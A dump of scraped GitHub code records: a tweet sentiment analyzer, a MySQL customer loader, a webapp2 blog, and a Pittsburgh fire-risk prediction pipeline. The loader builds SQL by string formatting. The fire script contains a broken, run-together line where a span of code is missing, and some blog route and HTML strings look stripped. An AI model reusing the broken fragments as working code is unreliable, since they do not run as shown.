TimeZone(LatLongList) == \"Eastern\":\r\n 
tweetsEast += 1\r\n sentimentTotal = 0\r\n keywordTotal = 0\r\n for char in tweetText:\r\n changedText = (char.strip(string.punctuation)).lower()\r\n for keyword in keywordsList:\r\n if changedText == keyword[0]:\r\n sentimentTotal += int(keyword[1])\r\n keywordTotal += 1\r\n #calculate the total eastern tweets\r\n try:\r\n totalEastDivided = sentimentTotal / keywordTotal\r\n if totalEastDivided != 0:\r\n keywordTweetsEast += 1\r\n totalEast += totalEastDivided\r\n except ZeroDivisionError:\r\n totalEastDivided = 0\r\n #if the timezone is Central, add one for the region and if the current word is a keyword, add it to the total\r\n elif TimeZone(LatLongList) == \"Central\":\r\n tweetsCentral += 1\r\n sentimentTotal = 0\r\n keywordTotal = 0\r\n for char in tweetText:\r\n changedText = (char.strip(string.punctuation)).lower() # removes trailing/leading punctuation of each word and turns into lowercase\r\n for keyword in keywordsList: # for each pairing in my keywords list, compare to the current word being looked at\r\n if changedText == keyword[0]:\r\n sentimentTotal += int(keyword[1])\r\n keywordTotal += 1\r\n #calculate the total Central tweets\r\n try:\r\n totalCentralDivided = sentimentTotal / keywordTotal\r\n if totalCentralDivided != 0:\r\n keywordTweetsCentral += 1\r\n totalCentral += totalCentralDivided\r\n except ZeroDivisionError:\r\n totalCentralDivided = 0\r\n #if the timezone is Mountain, add one for the region and if the current word is a keyword, add it to the total\r\n elif TimeZone(LatLongList) == \"Mountain\":\r\n tweetsMountain += 1\r\n sentimentTotal = 0\r\n keywordTotal = 0\r\n for char in tweetText:\r\n changedText = (char.strip(string.punctuation)).lower() # removes trailing/leading punctuation of each word and turns into lowercase\r\n for keyword in keywordsList: # for each pairing in my keywords list, compare to the current word being looked at\r\n if changedText == keyword[0]:\r\n sentimentTotal += int(keyword[1])\r\n keywordTotal += 1\r\n #calculate the total Mountain tweets\r\n try:\r\n totalMountainDivided = sentimentTotal / keywordTotal\r\n if totalMountainDivided != 0:\r\n keywordTweetsMountain += 1\r\n totalMountain += totalMountainDivided\r\n except ZeroDivisionError:\r\n totalMountainDivided = 0\r\n #if the timezone is Pacific, add one for the region and if the current word is a keyword, add it to the total\r\n elif TimeZone(LatLongList) == \"Pacific\":\r\n tweetsPacific += 1\r\n sentimentTotal = 0\r\n keywordTotal = 0\r\n for char in tweetText:\r\n changedText = (char.strip(string.punctuation)).lower() # removes trailing/leading punctuation of each word and turns into lowercase\r\n for keyword in keywordsList: # for each pairing in my keywords list, compare to the current word being looked at\r\n if changedText == keyword[0]:\r\n sentimentTotal += int(keyword[1])\r\n keywordTotal += 1\r\n #calculate the total Pacific tweets\r\n try:\r\n totalPacificDivided = sentimentTotal / keywordTotal\r\n if totalPacificDivided != 0:\r\n keywordTweetsPacific += 1\r\n totalPacific += totalPacificDivided\r\n except ZeroDivisionError:\r\n totalPacificDivided = 0\r\n #read the next tweet in the file\r\n tweetCurrent = tweetsFile.readline()\r\n\r\n #calculate the happiness scores for each region\r\n if keywordTweetsEast != 0:\r\n hapScoreEast = totalEast / keywordTweetsEast\r\n else:\r\n hapScoreEast = 0\r\n if keywordTweetsCentral != 0:\r\n hapScoreCentral = totalCentral / keywordTweetsCentral\r\n else:\r\n hapScoreCentral = 0\r\n if keywordTweetsMountain != 0:\r\n 
hapScoreMountain = totalMountain / keywordTweetsMountain\r\n else:\r\n hapScoreMountain = 0\r\n if keywordTweetsPacific != 0:\r\n hapScorePacific = totalPacific / keywordTweetsPacific\r\n else:\r\n hapScorePacific = 0\r\n\r\n #update each region's tuple with the values\r\n return[(hapScoreEast, keywordTweetsEast, tweetsEast),\r\n (hapScoreCentral, keywordTweetsCentral, tweetsCentral),\r\n (hapScoreMountain, keywordTweetsMountain, tweetsMountain),\r\n (hapScorePacific, keywordTweetsPacific, tweetsPacific)]\r\n\r\n except IOError:\r\n print(\"Sorry, the file you entered does not exist\")\r\n return []\r\n\r\n\r\n","repo_name":"wzhan772/sentimentAnalysis","sub_path":"sentimentAnalysis.py","file_name":"sentimentAnalysis.py","file_ext":"py","file_size_in_byte":8960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27184855341","text":"import pandas as pd\nimport numpy as np\n\ndef add_customers():\n from .connection import mydb, mycursor\n\n People = pd.read_csv(\"./db_initialization/RandomPeople.csv\")\n\n for i in range(len(People)-20):\n first_name = People['firstname'][i].replace(\"'\",\"\")\n last_name = People['lastname'][i].replace(\"'\",\"\")\n id = People['ID_Number'][i]\n id_type = People['ID_Type'][i]\n id_issue = People['ID_Issue'][i]\n birth_date = People['birthdate'][i]\n \n sqlFormula = \"\"\"INSERT INTO customers (first_name,last_name,birth_date,id,id_type,id_issue) \n VALUES ('{}','{}','{}',{},'{}','{}')\"\"\".format(first_name,last_name,birth_date,id,id_type,id_issue)\n mycursor.execute(sqlFormula)\n mydb.commit() \n sqlFormula = \"\"\"INSERT INTO customer_phones (NFC_ID,phone_number)\n VALUES ({},{})\"\"\".format(i+1,People['phone'][i])\n mycursor.execute(sqlFormula)\n mydb.commit() \n if i % 5 == 0:\n sqlFormula = \"\"\"INSERT INTO customer_phones (NFC_ID,phone_number)\n VALUES ({},{})\"\"\".format(i+1,People['phone2'][i])\n mycursor.execute(sqlFormula)\n mydb.commit() \n\n \n sqlFormula = \"\"\"INSERT INTO customer_emails (NFC_ID,email_address)\n VALUES ({},'{}')\"\"\".format(i+1,People['email'][i].replace(\"'\",\"\"))\n mycursor.execute(sqlFormula)\n mydb.commit() \n if i % 7 == 0:\n sqlFormula = \"\"\"INSERT INTO customer_emails (NFC_ID,email_address)\n VALUES ({},'{}')\"\"\".format(i+1,People['email2'][i].replace(\"'\",\"\"))\n mycursor.execute(sqlFormula)\n mydb.commit() \n\n","repo_name":"ThanosBb3/Database_Project","sub_path":"db_initialization/addCustomers.py","file_name":"addCustomers.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37046666943","text":"import os\nimport re\nfrom string import letters\n\nimport webapp2\nimport jinja2\n\nfrom google.appengine.ext import db\n\ntemplate_dir = os.path.join(os.path.dirname(__file__), 'templates')\njinja_env = jinja2.Environment(loader = jinja2.FileSystemLoader(template_dir),\n autoescape = True)\n\ndef render_str(template, **params):\n t = jinja_env.get_template(template)\n return t.render(params)\n\nclass BlogHandler(webapp2.RequestHandler):\n def write(self, *a, **kw):\n self.response.out.write(*a, **kw)\n\n def render_str(self, template, **params):\n return render_str(template, **params)\n\n def render(self, template, **kw):\n self.write(self.render_str(template, **kw))\n\n def render_post(response, post):\n response.out.write('' + post.subject + '
')\n        response.out.write(post.content)\n\nclass MainPage(BlogHandler):\n    def get(self):\n        t = jinja_env.get_template(\"base.html\")\n        content = t.render()\n        self.response.write(content)\n\nclass Post(db.Model):\n    subject = db.StringProperty(required = True)\n    content = db.TextProperty(required = True)\n    created = db.DateTimeProperty(auto_now_add = True)\n\nclass BlogFront(BlogHandler):\n    def get(self):\n        posts = db.GqlQuery(\"SELECT * FROM Post ORDER BY created DESC LIMIT 5\")\n        template = jinja_env.get_template(\"front.html\")\n        page = template.render(posts=posts)\n        self.response.write(page)\n\n\nclass ViewPostHandler(BlogHandler):\n    def get(self, id):\n        post = Post.get_by_id(int(id))\n        self.render(\"permalink.html\", post = post)\n\nclass NewPost(BlogHandler):\n    def get(self):\n        self.render(\"newpost.html\")\n\n    def post(self):\n        subject = self.request.get('subject')\n        content = self.request.get('content')\n\n        if subject and content:\n            posts = Post(subject = subject, content = content)\n            posts.put()\n            idTag = posts.key().id()\n            self.redirect('/blog/%s'% idTag)\n\n        else:\n            error = \"dude, come on!\"\n            self.render(\"newpost.html\", subject=subject, content=content, error=error)\n\n\napp = webapp2.WSGIApplication([('/', MainPage),\n                               ('/blog/?', BlogFront),\n                               webapp2.Route('/blog/', ViewPostHandler),\n                               ('/blog/newpost', NewPost)\n                               ],\n                              debug=True)\n","repo_name":"kevinarehart/build-a-blog","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"1100944853","text":"\n# coding: utf-8\n\n# In[1]:\n\n# importing relevant libraries\nimport matplotlib\n# Force matplotlib to not use any Xwindows backend.\n# matplotlib.use('Agg')\nimport pandas as pd\nimport numpy as np\nimport sqlalchemy as sa\nimport matplotlib.pyplot as plt\n# from sklearn.decomposition import PCA\n# from sklearn.preprocessing import scale\nfrom sklearn import datasets, linear_model, cross_validation, grid_search\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.cross_validation import KFold, StratifiedKFold, cross_val_score\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import classification_report\nfrom sklearn.model_selection import TimeSeriesSplit\nfrom sklearn_pandas import DataFrameMapper\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn import metrics\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import cohen_kappa_score\nfrom xgboost import XGBClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.metrics import accuracy_score\nfrom scipy import interp\nimport datetime\nfrom datetime import date\nfrom dateutil.relativedelta import relativedelta\nimport os\nimport functools\n\n# Turn off pandas chained assignment warning\npd.options.mode.chained_assignment = None  # default='warn'\npd.options.display.max_columns = 999\n\n\n# ### 1.
CLEAN PLI, PITT & TAX DATA\n\n# In[2]:\n\n# create directory paths for opening files\ncurr_path = os.path.dirname(os.path.realpath(__file__))\n# curr_path = os.path.dirname(os.path.realpath(\"fs_grid.ipynb\"))\ndataset_path = os.path.join(curr_path, \"datasets/\")\ninter_path = os.path.join(curr_path,\"interResults/\")\npng_path = os.path.join(curr_path,\"images/\")\n\n# read in data\n# Reading plidata\nplidata = pd.read_csv(os.path.join(dataset_path, \"pli.csv\"), encoding='utf-8', dtype={'STREET_NUM': 'str', 'STREET_NAME': 'str'}, low_memory=False)\n# Reading city of Pittsburgh dataset\npittdata = pd.read_csv(os.path.join(dataset_path, \"pittdata.csv\"), encoding=\"ISO-8859-1\", dtype={'PROPERTYADDRESS': 'str', 'PROPERTYHOUSENUM': 'str', 'CLASSDESC': 'str'}, low_memory=False)\n# Reading tax data\ntaxdata = pd.read_csv(\"./datasets/tax.csv\", encoding='utf-8')\n#read parcel data (matches parcels to census tract and block group\nparcel = pd.read_csv(os.path.join(dataset_path, \"parcels.csv\"), encoding='utf-8')\n#read ACS data\nacs_data = ['acs_income.csv','acs_occupancy.csv','acs_year_built.csv','acs_year_moved.csv']\ndef clean_acs(df):\n #Use descriptive names in first row\n df.columns = df.loc[0]\n df = df.drop(0)\n df = df.drop(['Id', 'Id2'], axis=1)\n #Extract census block and tract\n df[['BLOCKCE10', 'TRACTCE10']] = df['Geography'].str.extract(\n 'Block Group (\\d), Census Tract (\\d+\\.?\\d*)')\n df = df.drop(['Geography'], axis=1)\n #Drop first two columns since they only contain totals\n df = df.drop(df.columns[[0,1]], axis=1)\n #Drop margin of errors\n df = df.drop(df.columns[df.columns.str.startswith('Margin')], axis=1)\n #Convert to numbers\n df['BLOCKCE10'] = df['BLOCKCE10'].astype('float')\n df['TRACTCE10'] = df['TRACTCE10'].astype('float')\n #Multiply tract by 100 to be consistent with other data\n df['TRACTCE10'] = df['TRACTCE10'] * 100\n return df\nacs_data = map(lambda x: os.path.join(dataset_path, x), acs_data)\nacs_data = map(pd.read_csv, acs_data)\nacs_data = map(clean_acs, acs_data)\n#Merge datasets together\nacs_data_combined = functools.reduce(lambda x,y:x.merge(y, how='outer', on=['BLOCKCE10','TRACTCE10']), acs_data)\n\n# cleaning pitt dataset\n# removing all properties outside Pittsburgh, Wilkinsburg, and Ingram\npittdata = pittdata[(pittdata.PROPERTYCITY == 'PITTSBURGH')] # & (pittdata.PROPERTYCITY == 'WILKINSBURG') & (pittdata.PROPERTYCITY == 'INGRAM')]\n# include only residential data\npittdata = pittdata[pittdata['CLASSDESC'] == 'RESIDENTIAL']\naddress_parcels = pittdata[['PARID','PROPERTYADDRESS','PROPERTYHOUSENUM']].drop_duplicates()\npittdata = pittdata[pittdata['PROPERTYHOUSENUM'] != '0']\npittdata = pittdata[pittdata['PROPERTYADDRESS'] != '']\n# dropping columns with less than 15% data\npittdata = pittdata.dropna(thresh=4000, axis=1)\npittdata = pittdata.rename(columns={pittdata.columns[0]: 'PARID'})\n# pick out necessary columns\npittdata = pittdata[['PARID','PROPERTYHOUSENUM','PROPERTYADDRESS','MUNIDESC','SCHOOLDESC','NEIGHCODE',\n 'TAXDESC','OWNERDESC','USEDESC','LOTAREA','SALEPRICE','FAIRMARKETBUILDING','FAIRMARKETLAND']]\npittdata = pittdata.drop_duplicates()\n\n# cleaning pli dataset\n# removing extra whitespaces\nplidata['STREET_NAME'] = plidata['STREET_NAME'].str.strip()\nplidata['STREET_NUM'] = plidata['STREET_NUM'].str.strip()\n# include only residential data\nplidata = pd.merge(plidata, address_parcels[['PARID']], how='inner',left_on=['PARCEL'], right_on=['PARID'])\n# pick out necessary columns\nplidata=plidata[['PARCEL', 'INSPECTION_DATE', 
'INSPECTION_RESULT', 'VIOLATION']]\n# converting to datetime\nplidata.INSPECTION_DATE = pd.to_datetime(plidata.INSPECTION_DATE)\nplidata['violation_year'] = plidata['INSPECTION_DATE'].map(lambda x: x.year)\nplidata = plidata.drop_duplicates()\n\n# cleaning tax dataset\n# removing all properties outside Pittsburgh, Wilkinsburg, and Ingram\ntaxdata = taxdata[(taxdata.municipality == 'Pittsburgh')] # & (tax.municipality == 'Wilkinsburg Boro') & (tax.municipality == 'Ingram Boro')]\ntaxdata = taxdata.dropna(subset=['pin', 'tax_year', 'lien_description', 'amount', 'satisfied'])\n# include only residential data\ntaxdata = pd.merge(taxdata, address_parcels[['PARID']], how='inner', left_on=['pin'], right_on=['PARID'])\n# pick out necessary columns\ntaxdata = taxdata[['pin', 'filing_date', 'tax_year', 'lien_description', 'amount','satisfied']]\ntaxdata.filing_date = pd.to_datetime(taxdata.filing_date)\ntaxdata.tax_year=taxdata['tax_year'].apply(lambda x: date(x,12,31))\ntaxdata.tax_year = pd.to_datetime(taxdata.tax_year)\ntaxdata = taxdata.drop_duplicates()\n\n# cleaning parcel dataset\n# keep only parcel, tract, and block group\nparcel = parcel[(parcel.geo_name_cousub == 'Pittsburgh city')]\nparcel_blocks = parcel[['PIN', 'TRACTCE10', 'BLOCKCE10']]\n#get first digit of block, convert to int\nparcel_blocks['BLOCKCE10'] = parcel_blocks['BLOCKCE10'].astype(str).str[0].astype(float)\n#ignore bad parcels\nparcel_blocks = parcel_blocks[parcel_blocks['PIN'] != ' ']\nparcel_blocks = parcel_blocks[parcel_blocks['PIN'] != 'COMMON GROUND']\nparcel_blocks = parcel_blocks[~parcel_blocks['PIN'].str.match('.*County')]\nparcel_blocks=parcel_blocks.drop_duplicates()\n\n\n# #### 1.1 Aggregate pittdata to census block, then merge with acs data\n\n# In[3]:\n\npittdata_blocks=pd.merge(pittdata, parcel_blocks, how='left', left_on=['PARID'], right_on=['PIN'])\n#drop extra columns\npittdata_blocks = pittdata_blocks.drop(['PARID','PIN','PROPERTYHOUSENUM','PROPERTYADDRESS'], axis=1)\n\n\n#group by blocks\ngrouped = pittdata_blocks.groupby(['TRACTCE10','BLOCKCE10'])\n#change the '-DESC' columns to the most common in each group (block)\n#change the other columns to the mean\nmax_count = lambda x:x.value_counts().index[0]\npittdata_blocks = grouped.agg({\n 'MUNIDESC':max_count,'SCHOOLDESC':max_count,'NEIGHCODE':max_count,\n 'TAXDESC':max_count,'OWNERDESC':max_count,'USEDESC':max_count,'LOTAREA':np.mean,\n 'SALEPRICE':np.mean,'FAIRMARKETBUILDING':np.mean,'FAIRMARKETLAND':np.mean\n})\n#reset index to columns\npittdata_blocks = pittdata_blocks.reset_index(level=[0,1])\n#merge pittdata with acs\npittacs = pd.merge(pittdata_blocks, acs_data_combined, how='inner', on=['BLOCKCE10','TRACTCE10'])\n\n# keep a copy of blocks and tracts\nblocks = pittacs[['TRACTCE10','BLOCKCE10']].drop_duplicates()\n\n\n# #### 1.2 merge plidata with census block¶\n\n# In[4]:\n\n#group by blocks\nplidata_blocks = pd.merge(plidata, parcel_blocks, how='left', left_on=['PARCEL'], right_on=['PIN'])\n#drop extra columns\nplidata_blocks = plidata_blocks.drop(['PARCEL','PIN'], axis=1)\nplidata_blocks=plidata_blocks.dropna(subset=['TRACTCE10','BLOCKCE10'])\n\n\n# #### 1.3 Aggregate taxdata to census block¶\n\n# In[5]:\n\n# group by blocks\ntaxdata_blocks = pd.merge(taxdata,parcel_blocks, how='left', left_on=['pin'], right_on=['PIN'])\ntaxdata_blocks = taxdata_blocks.drop(['pin','PIN'],axis=1)\ntaxdata_blocks = taxdata_blocks.dropna(subset=['TRACTCE10','BLOCKCE10'])\n\n\n# ### 2. 
Clean fire incident data\n\n# In[6]:\n\n# loading fire incidents csvs\nfire_pre14 = pd.read_csv(os.path.join(dataset_path, \"Fire_Incidents_Pre14.csv\"), encoding='latin-1', dtype={'street': 'str', 'number': 'str'}, low_memory=False)\nfire_new = pd.read_csv(os.path.join(dataset_path, \"Fire_Incidents_New.csv\"), encoding='utf-8', dtype={'street': 'str', 'number': 'str'}, low_memory=False)\n\n# cleaning columns of fire_pre14\nfire_pre14['full.code'] = fire_pre14['full.code'].str.replace(' -', ' -')\nfire_pre14['st_type'] = fire_pre14['st_type'].str.strip()\nfire_pre14['street'] = fire_pre14['street'].str.strip()\nfire_pre14['number'] = fire_pre14['number'].str.strip()\nfire_pre14['st_type'] = fire_pre14['st_type'].str.replace('AV', 'AVE')\nfire_pre14['street'] = fire_pre14['street'].str.strip() + ' ' + fire_pre14['st_type'].str.strip()\n\n# drop irrelevant columns\npre14_drop = ['Unnamed: 0','PRIMARY_UNIT', 'MAP_PAGE', 'alm_dttm', 'arv_dttm', 'XCOORD', \n 'YCOORD','inci_id', 'inci_type', 'alarms', 'st_prefix',\n 'st_suffix', 'st_type', 'CALL_NO','descript','ï..AGENCY']\nfor col in pre14_drop:\n del fire_pre14[col]\n\n\npost14_drop = ['alm_dttm', 'arv_dttm', 'XCOORD', 'YCOORD', 'alarms', \n 'inci_type', 'CALL_NO','descript']\nfor col in post14_drop:\n del fire_new[col]\n\n# joining both the fire incidents file together\nfire_new = fire_new.append(fire_pre14, ignore_index=True)\nfire_new = fire_new[fire_new['full.code'].str.strip() != '540 - Animal problem, Other']\nfire_new = fire_new[fire_new['full.code'].str.strip() != '5532 - Public Education (Station Visit)']\nfire_new = fire_new[fire_new['full.code'].str.strip() != '353 - Removal of victim(s) from stalled elevator']\n\n# correcting problems with the street column\nfire_new['street'] = fire_new['street'].replace(to_replace=', PGH', value='', regex=True)\nfire_new['street'] = fire_new['street'].replace(to_replace=', P', value='', regex=True)\nfire_new['street'] = fire_new['street'].replace(to_replace=',', value='', regex=True)\nfire_new['street'] = fire_new['street'].replace(to_replace='#.*', value='', regex=True)\nfire_new['street'] = fire_new['street'].str.strip()\nfire_new['number'] = fire_new['number'].str.strip()\n\n# converting to date time and extracting year\nfireDate, fireTime = fire_new['CALL_CREATED_DATE'].str.split(' ', 1).str\nfire_new['CALL_CREATED_DATE'] = fireDate\nfire_new['CALL_CREATED_DATE'] = pd.to_datetime(fire_new['CALL_CREATED_DATE'])\nfire_new['fire_year'] = fire_new['CALL_CREATED_DATE'].map(lambda x: x.year)\n\n# removing all codes with less than 20 occurences\nfor col, val in fire_new['full.code'].value_counts().iteritems():\n if val < 20 and col[0] != '1':\n fire_new = fire_new[fire_new['full.code'] != col]\n\n#Split street column when there are 2 streets\nstreet_split = fire_new['street'].str.split('/')\nfire_new['street'] = street_split.map(lambda x:x[0])\nfire_new = fire_new.dropna(subset=['CALL_CREATED_DATE'])\nfire_new = fire_new.drop_duplicates()\n\n\n# #### 2.1 merge fire incident to census block\n\n# In[7]:\n\n# convert from addresses to parcels\nfire_parcel = pd.merge(fire_new, address_parcels, how='inner',\n left_on=['street','number'], right_on=['PROPERTYADDRESS','PROPERTYHOUSENUM'])\n# convert from parcels to census blocks\nfire_blocks = pd.merge(fire_parcel, parcel_blocks, how='left',left_on=['PARID'], right_on=['PIN'])\n#drop extra columns\nfire_blocks=fire_blocks.drop(['number','street','PARID','PROPERTYADDRESS',\n 'PROPERTYHOUSENUM','PIN', 'Unnamed: 0',\n 'st_prefix', 'st_suffix', 'st_type',\n 
'prop_use_code','response_time',\n 'CALL_TYPE_FINAL', 'COUNCIL', 'NEIGHBORHOOD',\n 'PRIMARY_UNIT','fire_year','prop_use_descript'],axis=1)\n#drop data without block or tract (this drops non-residential data)\nfire_blocks = fire_blocks.dropna(subset=['TRACTCE10','BLOCKCE10'])\n# dropping columns with less than 15% data\nfire_blocks = fire_blocks.dropna(thresh=len(fire_blocks)*0.15, axis=1)\nfire_blocks = fire_blocks.drop_duplicates()\n\n\n# ### 3 Join four datasets together\n# \n# #### 3.1 joining dynamic data with fire incidents\n\n# In[8]:\n\n# making the fire column with all type 100s as fires and map it to 0 or 1\nfire_blocks['fire'] = fire_blocks['full.code'].astype(str). map(lambda x: 1 if x[0]=='1' else 0)\n# keep non-fire incidents as features\nnonfire_incidents = fire_blocks[fire_blocks['fire'] != 1]\nnonfire_incidents = nonfire_incidents[['CALL_CREATED_DATE','full.code','TRACTCE10', 'BLOCKCE10']]\nfire_blocks.drop('full.code',axis=1,inplace=True)\n\n\n# group by every certain period of time\n# reason for setting period to year: tax data is based on year\nperiod = 'A'\nfire_groups = fire_blocks.groupby(pd.Grouper(key='CALL_CREATED_DATE', freq=period))\nnonfire_groups = nonfire_incidents.groupby(pd.Grouper(key='CALL_CREATED_DATE', freq=period))\nplidata_groups = plidata_blocks.groupby(pd.Grouper(key='INSPECTION_DATE', freq=period))\ntaxdata_groups = taxdata_blocks.groupby(pd.Grouper(key='tax_year', freq=period))\n\n# get the date of the earliest fire in each block in each year\nblock_fire_dates = fire_groups.apply(lambda x:x.groupby(['TRACTCE10','BLOCKCE10']).apply(lambda x:x[x['fire']==1].min()))\n\n# then group fire by census blocks\ndef groupByBlock(df,categoricals, method):\n dummies=[pd.get_dummies(df[feature]) for feature in categoricals]\n df = pd.concat([df]+dummies,axis=1)\n df.drop(categoricals,axis=1,inplace=True)\n df = pd.merge(df, blocks, how='right',on=['TRACTCE10','BLOCKCE10'])\n df_grouped=df.groupby(['TRACTCE10','BLOCKCE10'])\n if method == 'max':\n df_grouped=df_grouped.max()\n if method == 'sum':\n df_grouped=df_grouped.sum()\n return df_grouped\nfire_divided = fire_groups.apply(groupByBlock,categoricals=[],method='max')\nfire_divided.drop('CALL_CREATED_DATE',axis=1,inplace=True)\nfire_divided=fire_divided.reset_index()\nfire_divided=fire_divided.fillna(0)\n\n\n# group nonfire incidents by census blocks\ndef groupByBlockNonfire(df, categoricals, method):\n # only keep data that occurred before the fire\n year = df['CALL_CREATED_DATE'].iloc[0].year\n df = pd.merge(df, block_fire_dates[block_fire_dates['CALL_CREATED_DATE'].dt.year == year], how='left',\n on=['TRACTCE10', 'BLOCKCE10'], suffixes=['', '_F'])\n df['CALL_CREATED_DATE_F'] = df['CALL_CREATED_DATE_F'].fillna(pd.to_datetime('12-31-' + str(year)))\n df = df[df['CALL_CREATED_DATE'] <= df['CALL_CREATED_DATE_F']]\n df = df.drop(['CALL_CREATED_DATE_F', 'fire'], axis=1)\n\n dummies = [pd.get_dummies(df[feature]) for feature in categoricals]\n df = pd.concat([df] + dummies, axis=1)\n df.drop(categoricals, axis=1, inplace=True)\n df = pd.merge(df, blocks, how='right', on=['TRACTCE10', 'BLOCKCE10'])\n df_grouped = df.groupby(['TRACTCE10', 'BLOCKCE10'])\n if method == 'max':\n df_grouped = df_grouped.max()\n if method == 'sum':\n df_grouped = df_grouped.sum()\n return df_grouped\n\nnonfire_divided = nonfire_groups.apply(groupByBlockNonfire,categoricals=['full.code'],method='sum')\nnonfire_divided=nonfire_divided.reset_index()\nnonfire_divided=nonfire_divided.fillna(0)\n\n\n# group pli incidents by census blocks\ndef 
groupByBlock_pli(df):\n    # only keep data that occurred before the fire\n    year = df['INSPECTION_DATE'].iloc[0].year\n    df = pd.merge(df, block_fire_dates[block_fire_dates['CALL_CREATED_DATE'].dt.year == year], how='left',\n                  on=['TRACTCE10', 'BLOCKCE10'])\n    df['CALL_CREATED_DATE'] = df['CALL_CREATED_DATE'].fillna(pd.to_datetime('12-31-' + str(year)))\n    df = df[df['INSPECTION_DATE'] <= df['CALL_CREATED_DATE']]\n    df = df.drop(['CALL_CREATED_DATE', 'fire'], axis=1)\n    \n    INSPECTION_RESULT_dummies=pd.get_dummies(df['INSPECTION_RESULT'])\n    VIOLATION_dummies=df['VIOLATION'].str.get_dummies(sep=' :: ')\n    df = pd.concat([df,INSPECTION_RESULT_dummies,VIOLATION_dummies],axis=1)\n    df.drop(['INSPECTION_RESULT','VIOLATION','violation_year'],axis=1,inplace=True)\n    df = pd.merge(df, blocks, how='right',on=['TRACTCE10','BLOCKCE10'])\n    df_grouped=df.groupby(['TRACTCE10','BLOCKCE10']).sum()\n    return df_grouped\npli_divided=plidata_groups.apply(groupByBlock_pli)\npli_divided=pli_divided.reset_index()\npli_divided=pli_divided.fillna(0)\n\n\n# group tax data by census blocks\ndef groupByBlock_tax(df):\n    tax_dummies=pd.get_dummies(df['lien_description'])\n    df = pd.concat([df,tax_dummies],axis=1)\n    df.drop(['lien_description'],axis=1,inplace=True)\n    df = pd.merge(df, blocks, how='right',on=['TRACTCE10','BLOCKCE10'])\n    df_grouped=df.groupby(['TRACTCE10','BLOCKCE10']).sum()\n    return df_grouped\n\ntax_divided=taxdata_groups.apply(groupByBlock,categoricals=['lien_description'],method='sum')\ntax_divided=tax_divided.reset_index()\ntax_divided=tax_divided.fillna(0)\n\n\n# join fire, nonfire, pli, tax data together\nfire_nonfire = pd.merge(fire_divided,nonfire_divided,how='outer',\n                        on=['CALL_CREATED_DATE','TRACTCE10','BLOCKCE10'])\nfire_nonfire_pli = pd.merge(fire_nonfire,pli_divided,how='outer',\n                            left_on=['CALL_CREATED_DATE','TRACTCE10','BLOCKCE10'],\n                            right_on=['INSPECTION_DATE','TRACTCE10','BLOCKCE10'])\nfire_nonfire_pli_tax = pd.merge(fire_nonfire_pli,tax_divided,how='outer',\n                                left_on=['CALL_CREATED_DATE','TRACTCE10','BLOCKCE10'],\n                                right_on=['tax_year','TRACTCE10','BLOCKCE10'])\n# backfill the merge key from the pli/tax date columns before dropping them\nfire_nonfire_pli_tax['CALL_CREATED_DATE']=fire_nonfire_pli_tax['CALL_CREATED_DATE'].fillna(fire_nonfire_pli_tax['INSPECTION_DATE']).fillna(fire_nonfire_pli_tax['tax_year'])\nfire_nonfire_pli_tax.drop(['INSPECTION_DATE','tax_year'],axis=1,inplace=True)\n\n\n# drop columns with less than threshold% data\nthreshold=0.0001\ns=fire_nonfire_pli_tax.sum()\ndrop_columns=s[s val_cutoffdate]\nfs_train_data = encoded_traindata[encoded_traindata.CALL_CREATED_DATE <= val_cutoffdate]\n\nvaluation_data = valuation_data.drop(['CALL_CREATED_DATE','TRACTCE10','BLOCKCE10'], axis=1)\nfs_train_data = fs_train_data.drop(['CALL_CREATED_DATE','TRACTCE10','BLOCKCE10'], axis=1)\n\nencoded_traindata.drop(['CALL_CREATED_DATE','TRACTCE10','BLOCKCE10'],axis=1,inplace=True)\nencoded_traindata.fillna(0)\nX_train=np.array(encoded_traindata.drop(['fire'],axis=1))\ny_train=np.array(encoded_traindata['fire'])\n\n# preparing test set\nencoded_testdata = encoded_combined[encoded_combined.CALL_CREATED_DATE > cutoffdate]\nencoded_testdata.drop(['CALL_CREATED_DATE','TRACTCE10','BLOCKCE10'],axis=1,inplace=True)\nencoded_testdata.fillna(0)\nX_test=np.array(encoded_testdata.drop(['fire'],axis=1))\ny_test=np.array(encoded_testdata['fire'])\n\n#converting to array and reshaping the data to prep for model\nfireVarTrain = encoded_traindata['fire']\n#del encoded_traindata['fire']\nno_fire_train = encoded_traindata.drop(['fire'], axis =1)\nX_train = np.array(no_fire_train)\ny_train =
np.reshape(fireVarTrain.values,[fireVarTrain.shape[0],])\n\n#converting to array and reshaping the data to prep for model\nfireVarTest = encoded_testdata['fire']\n#del encoded_testdata['fire']\nno_fire_test = encoded_testdata.drop(['fire'], axis =1)\n#dropping fire attribute to make fire valuation dataset later\nX_test = np.array(no_fire_test)\ny_test = np.reshape(fireVarTest.values,[fireVarTest.shape[0],])\n\nX_validation = np.array(fs_train_data.drop(['fire'], axis=1))\ny_validation = np.array(fs_train_data['fire'])\n\n\n# ### 5 Experimented with RF, Adaboost, XGBoost \n\n# In[10]:\n\n# Random Forest model\nfrom sklearn.ensemble import RandomForestClassifier\n\nmodel_rf = RandomForestClassifier(n_estimators = 65)\nprint(model_rf)\nmodel_rf.fit(X_train, y_train)\npred_rf = model_rf.predict(X_test)\nreal = y_test\ncm_rf = confusion_matrix(real, pred_rf)\nprint(cm_rf)\n\nkappa_rf = cohen_kappa_score(real, pred_rf)\n\nfpr, tpr, thresholds = metrics.roc_curve(y_test, pred_rf, pos_label=1)\nroc_auc = metrics.auc(fpr, tpr)\n\nacc_rf = 'Accuracy = {0} \\n \\n'.format(float(cm_rf[0][0] + cm_rf[1][1]) / len(real))\nkapp_rf = 'kappa score = {0} \\n \\n'.format(kappa_rf)\nauc_rf = 'AUC Score = {0} \\n \\n'.format(metrics.auc(fpr, tpr))\nrecall_rf = 'recall = {0} \\n 